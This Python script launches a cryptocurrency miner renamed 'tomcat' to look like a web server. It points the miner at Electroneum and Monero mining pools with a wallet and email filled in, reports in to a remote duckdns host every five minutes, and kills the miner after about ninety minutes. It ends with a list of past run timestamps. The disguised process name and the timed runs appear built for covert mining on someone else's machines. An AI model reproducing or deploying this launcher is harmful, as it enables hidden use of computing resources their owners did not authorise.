import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:05.880731
#2018-02-17 16:27:06.729272
#2018-02-17 18:16:01.246650
#2018-02-17 20:03:03.936135
#2018-02-17 21:51:04.258290
#2018-02-17 23:36:03.415848
#2018-02-18 01:25:04.393852
#2018-02-18 03:12:06.521062
#2018-02-18 04:59:06.778209
#2018-02-18 06:51:05.020571
#2018-02-18 08:39:04.867097
#2018-02-18 10:25:06.422811
#2018-02-18 12:11:01.994343
#2018-02-18 13:57:05.712229
#2018-02-18 15:47:04.960927
#2018-02-18 17:38:01.967651
#2018-02-18 19:25:08.616163
#2018-02-18 21:10:01.229009
#2018-02-18 22:57:01.869972
#2018-02-19 00:44:06.622499
#2018-02-19 02:31:05.104744
#2018-02-19 04:17:05.927035
#2018-02-19 06:01:07.560880
#2018-02-19 07:50:08.963051
#2018-02-19 09:40:08.585850
#2018-02-19 11:29:03.916145
#2018-02-19 13:17:05.190703
#2018-02-19 15:04:06.212377
#2018-02-19 16:51:10.813251
#2018-02-19 18:37:04.539621
#2018-02-19 20:24:08.680217
#2018-02-19 22:13:01.702487
#2018-02-19 23:59:01.800521
#2018-02-20 01:46:01.774925
#2018-02-20 03:33:05.081513
#2018-02-20 05:20:06.713222
#2018-02-20 07:04:08.363793
#2018-02-20 08:49:07.005904
#2018-02-20 10:33:02.065824
#2018-02-20 12:18:05.677905
#2018-02-20 14:05:09.930042
#2018-02-20 15:50:08.643538
#2018-02-20 17:35:09.469714
#2018-02-20 19:24:05.873564
#2018-02-20 21:12:07.076284
#2018-02-20 22:56:05.971124
#2018-02-21 00:41:07.780177
#2018-02-21 02:26:06.872116
#2018-02-21 04:12:08.307630
#2018-02-21 05:58:06.765279
#2018-02-21 07:47:05.446119
#2018-02-21 09:29:05.243417
#2018-02-21 11:18:07.924267
#2018-02-21 13:07:06.077830
#2018-02-21 14:55:08.806351
#2018-02-21 16:44:08.527822
#2018-02-21 18:37:04.990867
#2018-02-21 20:22:05.818498
#2018-02-21 22:09:07.667066
#2018-02-21 23:58:07.468760
#2018-02-22 01:48:04.976195
#2018-02-22 03:35:06.005079
#2018-02-22 05:22:06.045068
#2018-02-22 07:08:01.979440
#2018-02-22 08:56:04.272559
#2018-02-22 10:44:07.377858
#2018-02-22 12:32:06.036217
#2018-02-22 14:17:04.400320
#2018-02-22 16:04:10.387492
#2018-02-22 17:51:08.269716
#2018-02-22 19:37:07.273898
#2018-02-22 21:30:08.773973
#2018-02-22 23:17:04.720472
#2018-02-23 01:04:01.460827
#2018-02-23 02:51:01.723408
#2018-02-23 04:39:06.830307
#2018-02-23 06:25:06.776902
#2018-02-23 08:12:08.462769
#2018-02-23 10:26:04.229509
#2018-02-23 12:19:03.696512
#2018-02-23 14:08:07.246776
#2018-02-23 15:58:01.918035
#2018-02-23 17:46:02.140060
#2018-02-23 19:34:04.940345
#2018-02-23 21:17:04.752521
#2018-02-23 23:04:03.711898
#2018-02-24 00:52:06.828057
#2018-02-24 02:48:07.377819
#2018-02-24 05:29:06.465824
#2018-02-24 07:16:01.540456
#2018-02-24 09:05:06.184213
#2018-02-24 11:04:06.725097
#2018-02-24 12:53:04.608730
#2018-02-24 14:41:05.460383
#2018-02-24 16:32:05.562525
#2018-02-24 18:22:02.106551
#2018-02-24 20:09:05.171355
#2018-02-24 21:53:01.733564
#2018-02-25 02:01:07.145652
#2018-02-25 05:55:08.300471
#2018-02-25 11:38:06.747490